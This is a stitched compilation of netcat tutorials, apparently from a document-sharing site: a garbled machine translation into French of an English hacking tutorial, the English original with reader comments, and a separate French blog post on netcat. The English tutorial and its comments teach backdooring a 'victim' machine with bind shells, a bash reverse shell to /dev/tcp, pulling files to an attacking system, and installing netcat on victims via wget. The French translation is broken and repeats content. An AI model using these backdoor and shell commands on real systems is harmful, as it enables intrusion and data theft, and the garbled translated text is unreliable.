Académique Documents
Professionnel Documents
Culture Documents
Dans ce tutoriel, nous allons examiner les capacités de cet outil simple
et comment le pirate en herbe peut l'utiliser.
Netcat comme tant de pirates outils a été créé pour être un outil
d'analyse de réseau. Développé par un homme seulement connu sous
le nom "Hobbit," il donna cet outil pour la communauté informatique
sans compensation, mais a reçu des dizaines de récompenses. Merci,
Hobbit!
En tant que tel, vous pouvez l' utiliser pour ouvrir les connexions TCP
et UDP entre deux machines sur un port que votre coeur désire. Il peut
également être utilisé comme outil de balayage de ports, semblable
à nmap. En outre, il peut être utilisé pour la redirection de port,
mandatement, serveur web simple, et en laissant une porte dérobée
ouverte pour le pirate.
Regardons certaines de ces capacités à l' aide de notre système de
BackTrack .
Une fois que nous avons tiré notre système de BackTrack et ouvert un
terminal, nous pouvons utiliser netcat partir d'un répertoire car il est
situé dans notre répertoire bin qui est dans notre variable PATH, par
défaut.Donc, nous allons tapez:
nc -h
Comme vous pouvez le voir, la syntaxe de base pour netcat est le
suivant.
-p port de nc
nc 192.168.1.105 80
Cela nous donne une connexion TCP, par défaut, le serveur Web (port
80) à 192.168.1.105. Maintenant, tout ce que nous tapons, nous serons
envoyés directement au serveur Web quand nous avons frappé entrer.
Une fois que nous avons une connexion TCP à un serveur web, nous
pouvons utiliser netcat pour saisir la bannière du serveur Web pour
identifier ce que les services Web du logiciel de la victime est en cours
d'exécution.
Soyez prudent et copier exactement comme je l'ai tapé avec les barres
obliques et des espaces.
Hit entrer quelques fois et le serveur Web répondra avec sa bannière
nous dire exactement ce que le logiciel est en cours d'exécution. Dans
ce cas, nous pouvons voir que le serveur Web est en cours d'exécution
de Microsoft IIS 6.0.
Nous pouvons utiliser cette technique sur d' autres sites publics, aussi
bien.Essayons sur certains sites Web largement connus et voir ce
serveur web logiciels qu'ils exécutent. Tout d' abord, nous allons
essayer ce site,wonderhowto.com . Quand nous cingler
wonderhowto.com, nous voyons que l'adresse IP est
98.129.110.26. Donc, nous pouvons alors taper:
nc 98.129.110.26 80
Allez-y et essayer sur d'autres sites et savoir quel serveur ils courent.
Étape 4: Utilisez Netcat pour écouter les connexions
nc - l -p 6996
nc -l -p 6996 -e cmd.exe
nc 192.168.1.105 6996
Comme vous pouvez le voir, l'invite de commande Windows a été
acheminée par notre connexion netcat directement à notre système
d'attaque! Nous possédons cette boîte!
nc -l -p 6996> financialprojections.xls
Cette commande dit créer un écouteur (l) sur le port (p) 6996, puis
envoyer les données reçues sur cet écouteur dans un fichier
nomméfinancialprojections.xls .
Voir également
Comment ajouter une broche et un stylo à un couteau
Huntsman armée suisse
Comment choisir une serrure avec un couteau suisse
Comment ouvrir une boîte en utilisant un couteau suisse
Montre plus...
Pensez à donner Kudos, Tweet, Like, & Partager
SouscrireDE
Participez à la discussion
EIGHTFOURONE
CIPH3R00T
1
Vous pouvez également le télécharger sur la machine de la victime
enutilisant la commande wget comme ceci:
wget http://sourceforge.net/projects/nc110/files/latest/download
, puis l' installer sur la machine de la victime ...
il y a 8 mois
Répondre
IAN MILLER
ceci est juste nc..the question is..im à home..and veux obtenir sur un
ordinateur miles loin mais je ne peux pas pénétrer dans la house..so
comment allez-vous pour obtenir nc sur leur machine? .. donc je
pourrait le faire ... (pas que im faire this..its une analogie) .. Merci
il y a 3 mois
Répondre
OCCUPYTHEWEB
Huit:
OTW
il y a 2 ans
Répondre
MAL GENIOUS
Salut OTW,
Cordialement
mal Genious
il y a 2 ans
Répondre
OCCUPYTHEWEB
1
Mal:
OTW
il y a 2 ans
Répondre
MAL GENIOUS
OTW
lors de mes recherches sur les cookies HttpOnly je sais que ce sont les
meilleurs en termes de configuration de sécurité (pour éviter
XSS). Donc, si je parviens à obtenir le plus haut sont-ils les cookies à
l'administrateur ou ils font partie de la configuration de jeter testeurs
loin?
evilgenious
il y a 2 ans
Répondre
CARLOS ROYALE
1) Après netcat est installé comme une porte dérobée sur un système,
comment un pentester configurer la porte dérobée netcat pour être
utilisé en tant que proxy chaussettes?
2) Est-il possible de procurations chaîne netcat ensemble pour utiliser
successivement?
Merci d'avance!
il y a 1 an
Répondre
OCCUPYTHEWEB
oui, cela peut être fait, mais il y a des moyens plus faciles.
il y a 1 an
Répondre
CARLOS ROYALE
ENKIN EFEROUS
CIUFFY
2
Je voudrais partager ce qu'il est possible d'obtenir net chat travaillant
sur Mac OSX aussi.
Bien que la commande par défaut "nc" émule le netcat legit, l'option "-
e" ne sont pas disponibles, donc pratiquement inutile pour backdoorer.
LE ROI LION
hhello monsieur OTW ... est-il possible de voir le code source de netcat
directement sur kali? sur une note..is plus générale, il est possible de
voir le code source des outils ou des programmes installés sur un
système Linux distros? si c'est le cas, comment? Merci
il y a 1 an - édité il y a 1 an
Répondre
OCCUPYTHEWEB
Roi:
Presque tout sur notre plateforme Kali est open source, y compris le
Debian Linux, il est construit.
OTW
il y a 1 an
Répondre
LE ROI LION
1
qui a été entendu ... mais en supposant h sans internet puis-je voir le
code source directement quelque part dans le système d'exploitation?
OCCUPYTHEWEB
Ces fichiers sont déjà compilés. Vous avez besoin des fichiers non
compilés pour afficher le code source.
il y a 1 an
Répondre
CAMERON VERRE
CAMERON VERRE
BAHA BAGDADI
1
Pour le bash shell linux nous utilisons: bash -i> &
/dev/tcp/192.168.1.88/1234 0> & 1
pour envoyer une connexion, qu'en commande shell windows ?? aidez
- moi ici ...!
il y a 7 mois
Répondre
OCCUPYTHEWEB
BAHA BAGDADI
TRIPHAT
1
Malheureusement, Windows ne vient pas avec des outils cli beaucoup
utiles .. vous pouvez télécharger netcat ici et la plupart
des autres ici .
il y a 7 mois
Répondre
OCCUPYTHEWEB
Je suis sûr qu'il ya d'autres façons, mais cet article est sur l'utilisation
de netcat.
il y a 7 mois
Répondre
DAYLAN DEAN
THEROBYNHODE
Robyn
il y a 7 mois
Répondre
THEROBYNHODE
1
Si quelqu'un se demandait sessions d'utilisation -u <id de session>
dans Metasploit http://securityweekly.com/2010/04/25/using-
meterpreter-to-control-n/~~number=plural Robyn
il y a 6 mois
Répondre
MACCOY
MACCOY
Posted By
occupytheweb17K2 years ago
Follow
505050
KUDOS
For over 15 years, a tiny but powerful tool has been used by hackers for
a wide-range of activities. This tool goes by the name of netcat, and
although well known in hacking circles, it's virtually unknown outside.
It's so powerful and useful, that many people within the hacking
community refer to it as the "Swiss Army knife of hacking tools."
In this tutorial, we'll look at the capabilities of this simple tool and how
the aspiring hacker can use it.
As such, you can use it to open up TCP and UDP connections between
two machines over any port your heart desires. It can also be used as a
port scanning tool, similar to nmap. In addition, it can be used for port
forwarding, proxying, simple web server, and leaving an open backdoor
for the hacker.
Let's look at some of those capabilities using our BackTrack system.
nc -h
As you can see, the basic syntax for netcat is the following.
nc -l -p port
nc 192.168.1.105 80
This gives us a TCP connection, by default, to the web server (port 80)
at 192.168.1.105. Now, whatever we type, we will be sent directly to
the web server when we hit enter.
Now that we have a connection, we can do the banner grab to the web
server by typing:
HEAD / HTTP/1.0
Be careful and copy exactly as I typed it with the slashes and spaces.
Hit enter a few times and the web server will respond with its banner
telling us exactly what software it is running. In this case, we can see
that the web server is running Microsoft's IIS 6.0.
We can use this technique on other public websites, as well. Let's try it
on some widely known web sites and see what web server software
they're running . First, let's try this website, wonderhowto.com. When
we ping wonderhowto.com, we see that the IP address is
98.129.110.26. So, we can then type:
nc 98.129.110.26 80
HEAD / HTTP/1.0
If we try the same thing with cnn.com, we get the results below.
Go ahead and try it on other websites and find out what server they're
running.
Step 4: Use Netcat to Listen for Connections
Now, let's use netcat to create a listener on the remote system. Let's
assume that we have a Windows server that we have installed netcat
on. We can now type the following to open a netcat listener on port
6996 (it can be any port) on that system.
nc - l -p 6996
Now let's create a backdoor on the victim system that we can come
back to at any time. The command will vary slightly based upon
whether we are attacking a Linux or Windows system.
nc -l -p 6996 -e cmd.exe
nc -l -p 6996 -e /bin/bash
This will open a listener on the system that will "pipe" the command
shell or the Linux bash shell to the connecting system. Then on our
attacking system, we type:
nc 192.168.1.105 6996
As you can see, the Windows command prompt has been piped through
our netcat connection directly to our attacking system! We own that
box!
We can see in the screenshot below that the file was copied across our
netcat connection over port 6996 to our attacking machine!
This is just a small sample of what this powerful little program can do.
When you combine it with some basic scripting skills, you can only
imagine the incredible things we can do!
In futures tutorials, we will look at other ways that this powerful, little
tool can help astute hackers, so keep coming back!
See Also
How to Add a pin and pen to a Swiss Army Knife Huntsman
How to Pick a lock with a Swiss army knife
How to Open a can using a Swiss Army Knife
Show More...
Remember to Give Kudos, Tweet, Like, & Share
SubscribeOFF
EIGHTFOURONE
Does this file transfer and everything only work if you have netcat
installed on the remote computer? If so, how could you get it to install
and then interact with it without using physical access, is there like a
payload for it or something?
2 years ago
Reply
CIPH3R00T
1
You can also download it on victim's machine using the wget command
like this:
wget http://sourceforge.net/projects/nc110/files/latest/download
and then install it on victim's machine...
8 months ago
Reply
IAN MILLER
OCCUPYTHEWEB
Eight:
Good question! If you don't have physical access, you will need to
upload it the system. TFTP would be one option. If you were able to get
a command prompt through Metasploit, you can upload netcat by TFTP.
OTW
2 years ago
Reply
EVIL GENIOUS
Hi OTW,
Regards
evil genious
2 years ago
Reply
OCCUPYTHEWEB
Evil:
I'm not sure what you are asking me and what this has to do with this
tutorial on netcat?
OTW
2 years ago
Reply
EVIL GENIOUS
OTW
during my research on httponly cookies i know that they are the best in
terms of security configuration (to avoid xss). So if I manage to get the
above are they the cookies for the administrator or they are part of the
configuration to throw testers away ?
evilgenious
2 years ago
Reply
CARLOS ROYAL
Great writeup! Now to poke at your brain (in hopes of being pointed in
the right direction) ;)
3) If it's not possible to chain netcat proxies together through it's own
internal configs, could they be chained together using proxychains?
CARLOS ROYAL
ENKIN EFEROUS
Carlos, you might want to check out Socat. It's essentially netcat with
a bunch of added crypto/tunneling gear.
1 year ago
Reply
CIUFFY
I'd like to share that it is possible to get net cat working on Mac OSX
too.
Though the default command "nc" emulates the legit netcat, the "-e"
option is not available, so practically useless for backdooring.
THELIONKING
hhello sir OTW...is it possible to see the source code of netcat directly
on kali? on a more general note..is it possible to see the source code of
installed tools or programs on a linux distros? if so how? thanks
1 year ago - edited 1 year ago
Reply
OCCUPYTHEWEB
King:
OTW
1 year ago
Reply
THELIONKING
doing for example i cd to usr/bin and i try gedit netcat or some other
tool..but nothing shows up..well those a files to be executed but what
about wanting to read the source assuming am without internet?
OCCUPYTHEWEB
1
Those files are already compiled. You need the uncompiled files to view
the source code.
1 year ago
Reply
CAMERON GLASS
OTW, I keep trying to use netcat to connect to the ftp server of some
websites, like cnn, and things like that. I type HEAD / HTTP/1.O and
nothing comes up. Am I doing something wrong?
1 year ago
Reply
CAMERON GLASS
BAHA BAGHDADI
OCCUPYTHEWEB
TRIPHAT
1
Sadly, Windows doesn't come with much useful cli tools .. you can
download netcat here and most others here.
7 months ago
Reply
OCCUPYTHEWEB
I'm sure there are other ways, but this article is about using netcat.
7 months ago
Reply
DAYLAN DEAN
I am a newbie and love the knowledge shared here on this site. I need
help with an issue that I have had happen similar to this current hack
but it was done to me on my rooted Samsung galaxy s4. Any advice or
suggestions on how to retaliate or something? Thanks
7 months ago
Reply
THEROBYNHODE
THEROBYNHODE
1
If anyone was wondering use sessions -u <session id> in metasploit
http://securityweekly.com/2010/04/25/using-meterpreter-to-control-n/
Robyn
6 months ago
Reply
MACCOY
MACCOY
Netcat est un utilitaire Unix simple qui permet de gérer les sockets (connexions réseaux), c’est-à-dire qu’il est
capable d’établir n’importe qu’elle connexion à un serveur, en choisissant le port, l’IP etc. Il est conçu pour être un
outil « back-end » et peut-être utilisé directement par d’autres programmes et/ou scripts.
Netcat est distribué librement sous la licence GNU Licence Publique Générale (GPL).
Installation :
Linux – Debian
wget http://internap.dl.sourceforge.net/sourceforge/netcat/netcat-0.7.1.tar.gz
~$ tar -xzf netcat-0.7.1.tar.gz
~$ cd netcat-0.7.1
~/netcat-0.7.1$ ./configure
~/netcat-0.7.1$ make
Windows
Utilisation basique :
Socket TCP
Commençons simplement : Ouverture d’une socket en mode listening du port 1337 :
nc -l -p 1337
Bon là tu peux te dire « eh dude, c’est quoi mode listening port 1337 ? » Bien pour faire très simple, on ouvre le
port 1337 sur notre machine en local et on tend l’oreille !
On peut vérifier en ouvrant une autre instance de Netcat qui va nous servir de client. On se connecte ici à
localhost (vu qu’on test sur notre propre machine) sur le port 1337 :
nc localhost 1337
Dans ce cas précis, on se limitera à une entrée clavier STDIN. Chaque phrase taper sur le serveur sera envoyer
au client et vice/versa.
Ouaiiii on est fort on a réussi à faire un système de chat concurrent direct de MSN…ou pas…
Socket UDP
On ajoute simplement -u pour la création de notre socket :
nc -l -u -p 1337
Redirections Entrées / Sorties
NetCat nous permet de manipuler facilement les entrées/sorties.
Il est possible d’effectuer la manipulation inverse, à savoir rediriger les flux dans un fichier :
nc -l -p 1337 > file.log
NetCat permet aussi de rediriger les entrées et sorties d’un programme vers notre socket. Vous pouvez faire en
sorte que la connexion à travers un socket aboutisse au lancement d’un programme :
nc -vv -l -p 1337 -e '/bin/sh' -t
-v signifie verbose et permet d’avoir plus d’information sur ce qui se passe réellement. -tpermet de négocier une
session telnet.
Il suffit de piper (se prononce paillepé) la commande pv qui permet d’indiquer la progression d’un flux en temps
réel :
cat file.tar.gz | pv -b | nc -l 1337
On peut implémenter la même chose côté client :
nc IP_SERV 1337 | pv -b > file.tar.gz
Requête HTTP
Il est possible d’utiliser Netcat pour faire de la capture de bannières :
nc -v www.unnomdedomainequitue.com
A ce stade, n’importe quelle entrée génère une réponse. Dans notre exemple, si vous appuyez sur la touche
Entrée, vous obtiendrez ce type de résultat :
HTTP/1.1 400 Bad Request
Server: Apache...
Date: ...
Content-Type: text/html
Content-Length:92
...
...
Une astuce dans le fichier readme de netcat indique comment rediriger le contenu d’un fichier dans netcat afin
d’obtenir des informations supplémentaires des systèmes distants. Ainsi, il est possible de créer un fichier texte
nommé chocapicz.txt contenant la ligne GET /HTTP/1.1, suivie de deux retours chariot, puis de taper la
commande suivante :
nc -nvv -o bannieres.txt IP_SERV 80 < chocapicz.txt
Scan de ports
Une dernière particularité de Netcat en mode client est qu’il permet d’effectuer un scan de port.
Pour se faire, il suffit d’utiliser l’option -v, ou -vv si vous souhaitez obtenir des information supplémentaires sur les
résultats du scan.
Par exemple, la commande nc -vv 127.0.0.1 1-65535 va effectuer un scan détaillé de vos ports 1 à 65535 (c’est-
à-dire tous). Mais vous remarquerez que Netcat effectue ce scan en testant les ports un par un, par ordre
décroissant. Par très discret non ? Pour éviter cela, l’utilisation de l’option -r permet de scanner les ports
aléatoirement. Par contre, dès que Netcat trouve un port ouvert, il arrête son scan. Pas super pratique n’est-ce
pas ? Pour forcer netcat à scanner la totalité des ports demandés, il existe l’option -z. Il est également possible de
définir la durée entre le scan de chaque port, grâce à l’option -i suivie du délai souhaité, en milli-secondes.
Enfin, pour scanner plusieurs plages de ports, il suffit de les séparer par un espace. Exemple :
nc -vv -i 3000 -r -z IP_SERV 21 23 80-160 1337
Cette commande va effectuer le scan détaillé des ports 21, 23, 80 à 160 et 1337 du SERV, dans un ordre
aléatoire, avec un intervalle de 3 secondes entre chaque scan.
Un dernier point sur le mode scan de Netcat : l’utilisation du protocole UDP au lieu de TCP, ce qui permet de
scanner des ports dont les applications utilisent le protocole UDP.
Pour utiliser UDP, il suffit de rajouter l’option -u dans votre ligne de commande.
VOIP
Il est possible d’utiliser netcat pour la VOIP \o/ Pour cela rien de bien compliquer.
Il faut savoir que Netcat laisse passer les commandes en clair sur le réseau.
Il est donc plus appréciable d’utiliser Cryptcat sachant que ce dernier utilise les mêmes commandes que Netcat.
Cet article a été posté le 20 décembre 2009 à 15 h 14 min. Vous pouvez suivre les réponses à ce bulletin avec le flux suivant RSS 2.0.
Vous pouvez laisser un commentaire, ou faire un trackback depuis votre propre site.
15 Responses to "Netcat"
Nicolas says:
18 décembre 2013 à 19 h 18 min
Hello Paqueuc,
En fait tu as plusieurs versions de Netcat dont certaines qui ne prennent pas en compte
l’option -e.
Il faut s’assurer que dans l’aide tu as bien ces options. Parfois cela diffère légèrement.
Paqueucsays:
11 août 2013 à 22 h 51 min
Bonjour,
Super article ! J’espère que Netcat va pouvoir résoudre un problème que je traine depuis
quelques mois.
J’ai un système domotique avec une box capable d’allumer / éteindre des prises de courant et
capable d’envoyer des requêtes http, udp ou tcp. J’ai 5 Raspberry Pi que j’utilise en
Squeezebox (distribution Debian). Les Rpi s’allument avec la prise de courant. J’ai besoin de
les éteindre pour économiser l’énergie et pour qu’ils fonctionnent correctement (24 h sans
activité = bug. Ils sont ensuite physiquement éteint par la prise de commande. J’ai besoin de
les mettre en halt mode avant…). Mais je n’arrive pas à trouver la commande qui les éteint.
En telnet, rien n’y fait. De fil en aiguille, j’arrive à un truc du genre :
1/ installation de netcat
2/ écriture dans le fichier /etc/rc.local du code :
ou
nc -l -u -p 1337 ; /sbin/poweroff &
3/ Simple connexion avec ma box domotique en UDP sur le port 1337 est censé éteindre le
Rpi (sans envoyer de commande).
Sauriez vous me donner une procédure précise (création d’un fichier avec la commande ? à
placer à quel endroit et contenant quelle commande SVP ?)
Autre ?
Vous remerciant par avance pour l’aide que vous pourriez m’apporter.
Cordialement,
Paqueuc
Nicolas says:
22 septembre 2012 à 20 h 05 min
Bonjour,
netcat est un outil qui va permettre de se connecter à un service distant et/ou de créer un
socket en écoute sur un port donné.
On peut éventuellement envoyer une requête pour exploiter une SQLi, ou autre a travers
netcat, c’est pas un problème. Cela peut être utile pour éviter certaines protections sur les
navigateurs web récents. Pour la partie web, on utilisera toutefois plus volontiers des outils
commeburp suite.
Dubois says:
22 septembre 2012 à 17 h 46 min
Bonjour,
Un internaute m’explique que l’on peu pirater mon site via NETCAT est ce vrai et de quelle
façon ?
Nicolas says:
27 février 2012 à 22 h 46 min
Hello jeandez, en réalité, cela dépend de la version de netcat utilisé. Sur BT5 par exemple :
jeandez says:
24 février 2012 à 11 h 57 min
bonjour ,
je lance : nc -L 1234 (sur ubuntu 10.04)
j’obtiens: invalide option — L
Aussi je fais nc -l -p 1234 -e /bin/sh
j’obtiens nc: invalid option –e
je rappelle aussi que nc -l -p 1234 ne marche pas , il faut plutot faire nc -l 1234
helo says:
14 décembre 2011 à 1 h 47 min
Ave Voxpopulli,
VoxPopulisays:
7 août 2011 à 19 h 21 min
Sur ubuntu (je n’ai pas encore essayé sur windows), la commande serait:
Pour le serveur:
sudo netcat -l 1337
Pour le client:
netcat 127.0.0.1 1337
Pour le moment le seul moyen que j’ai trouvé pour ouvrir un shell est d’utiliser une pipe sur le
serveur:
sudo netcat -l 1337 | gnome-terminal
Mais je n’ai pas encore trouvé comment communiquer avec celui-ci. Si non il est possible de
passer par un fichier et d’utiliser un programme qui au lieu d’être en écoute sur le réseau est
en écoute sur le fichier.
Nicolas says:
31 juillet 2011 à 16 h 45 min
Yop VoxPopuli,
nc -l -p 1337 -e ‘/bin/sh’
Sur le windows :
nc IP_du_poste-distant 1337
tu lances une commande de type ls /
VoxPopulisays:
31 juillet 2011 à 11 h 48 min
Juste pour préciser, après avoir essayé bien entendu, l’option « -e » qui est présenté ici
comme permettant de renvoyer vers un shell plus tôt que vers un fichier ne marche que sur
windows, elle est absente sur Linux.
Nicolas says:
8 octobre 2010 à 20 h 48 min
Bonjour,
charlie says:
7 octobre 2010 à 12 h 58 min
Petit conseil pour les débutants : Avant d’écrire un tuto sur une commande veillez à bien
assimiler ses options.
Il s’agit d’une erreur d’utiliser les options -p et -l conjointement.
Lisez le manuel de la commande.
Nicolas says:
2 septembre 2010 à 22 h 16 min
Bonjour,
Netcat est un outil assez simple d’utilisation mais il faut avant tout comprendre la notion de
ports et la notion de sockets. Après avoir compris ces notions, vous pouvez regarder un petit
peu plus en profondeur le protocole TCP/IP, le modèle OSI etc. dans le but de comprendre ce
qu’on va réellement effectuer avec l’outil Netcat.
En gros, on va ouvrir une porte sur notre PC et se mettre à écouter (serveur). Une personne
va pouvoir se connecter sur cette porte et établir une connexion (client).
De base, on va pouvoir dialoguer en écrivant du texte qui sera retranscrit entre le client et le
serveur (un msn très simplifié).
N’hésitez pas à regarder ce site : http://www.frameip.com dans la partie « Les entêtes » pour
plus de précisions.
sitou says:
2 septembre 2010 à 20 h 47 min
salu
je suis un debutant et je ne comprend pas grand chose dans tout ceci mais cela m’interesse
vraiment!
dite moi par ou je doit commencer pour arriver a comprendre ces choses! please help!!!
raylook says:
17 juin 2010 à 19 h 19 min
merci